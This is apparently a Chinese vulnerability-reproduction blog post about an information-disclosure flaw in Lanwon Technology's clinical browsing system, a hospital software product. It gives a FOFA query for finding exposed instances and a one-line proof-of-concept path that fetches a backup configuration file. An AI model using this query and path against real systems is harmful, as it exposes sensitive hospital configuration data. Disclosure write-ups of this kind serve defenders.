【漏洞复现】蓝网科技临床浏览系统信息泄露漏洞

Nx01 产品简介

蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。

Nx02 漏洞描述

蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。

Nx03 产品主页

fofa-query: title=="临床浏览"

Nx04 漏洞复现

POC:

复制代码
/config/config%20bak.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
H13469489021 分钟前
华为服务器系统备份,想要备份华为服务器系统可以怎么操作?
运维·服务器·负载均衡
wangjun515933 分钟前
linux,物理机、虚拟机,同时内外网实现方案;物理机与虚拟机互通网络;
linux·服务器·网络
杰克崔38 分钟前
分析sys高问题的方法总结
linux·运维·服务器
Bruce-li__1 小时前
深入理解Python asyncio:从入门到实战,掌握异步编程精髓
网络·数据库·python
self-discipline6341 小时前
【计网速通】计算机网络核心知识点与高频考点——数据链路层(二)
网络·网络协议·计算机网络
xyliiiiiL2 小时前
一文总结常见项目排查
java·服务器·数据库
叫醒你笛莎2 小时前
IGMP(Internet Group Management Protocol)与组播技术深度解析
网络
lulinhao2 小时前
HCIA/HCIP基础知识笔记汇总
网络·笔记
暴走的YH3 小时前
【网络协议】三次握手与四次挥手
网络·网络协议
刘若水3 小时前
Linux: 进程信号初识
linux·运维·服务器